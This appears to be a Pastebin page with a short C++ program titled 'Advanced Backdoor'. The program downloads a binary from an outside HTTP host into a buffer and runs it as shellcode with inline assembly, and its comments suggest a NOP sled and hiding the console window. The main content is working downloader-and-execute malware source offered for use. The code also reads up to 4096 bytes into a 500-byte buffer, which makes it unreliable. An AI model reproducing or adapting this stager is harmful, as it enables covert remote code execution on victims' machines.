API tools faq
paste
Advertisement
armitage1989

Advanced Backdoor

armitage1989
Mar 8th, 2012
1,679
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 2.18 KB | None | 0 0
raw download clone embed print report
  1. //include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
  2. #include <windows.h>
  3. #include<iostream>
  4. #include<cstring>
  5. #include<Wininet.h>
  6. using namespace std;
  7. //this is a buffer with shellcode data in .bss section
  8. unsigned char DataReceived[500];
  9. int main(){
  10.     int i;
  11.     //this configure a HTTP agent to surf
  12.   HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
  13.     //if for validate connection.
  14.    if(!connect){
  15.       cout<<"Connection Failed or Syntax error";
  16.       return 0;
  17.    }
  18.  //Open a malicious url
  19. HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);
  20.  
  21.  //this check the handler for URL
  22.    if ( !OpenAddress )
  23.    {
  24.       DWORD ErrorNum = GetLastError();
  25.       cout<<"Failed to open URL \nError No: "<<ErrorNum;
  26.       InternetCloseHandle(connect);
  27.       return 0;
  28.    }
  29.  
  30.  
  31.    DWORD NumberOfBytesRead = 0;
  32.    
  33.    //this recovery a file on server and save data into DataReceived
  34.    while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
  35.    {
  36.    //this print the data in format \x00 you can delete this routine
  37.    for(i=0;i<sizeof DataReceived; i++ ){
  38.                    
  39.                    printf("\\x%02x",DataReceived[i]);
  40.                      
  41.                     }
  42.    /*this routine is a other implementattion of shellcode-test but in this routine i use  __asm () directive for call asm intrucctions.
  43.    1)first i store a pointer to buffer in EAX register
  44.    2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
  45.    3)the ret instruction put the value of esp+4 into eip and pass the execution.
  46.    4)finally the shellcode in DataReceived is executed
  47.    5)all handler is closed.
  48.    NOTA:
  49.         you can put a nopsled before shellcode for estabilish execution .
  50.         use freeconsole for hidden a Dos Windows
  51.    */
  52. __asm ("lea _DataReceived, %eax");
  53. __asm ("push %eax");
  54. __asm ("ret");
  55.    }
  56.  
  57.    InternetCloseHandle(OpenAddress);
  58.    InternetCloseHandle(connect);
  59.  
  60.    return 0;
  61. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!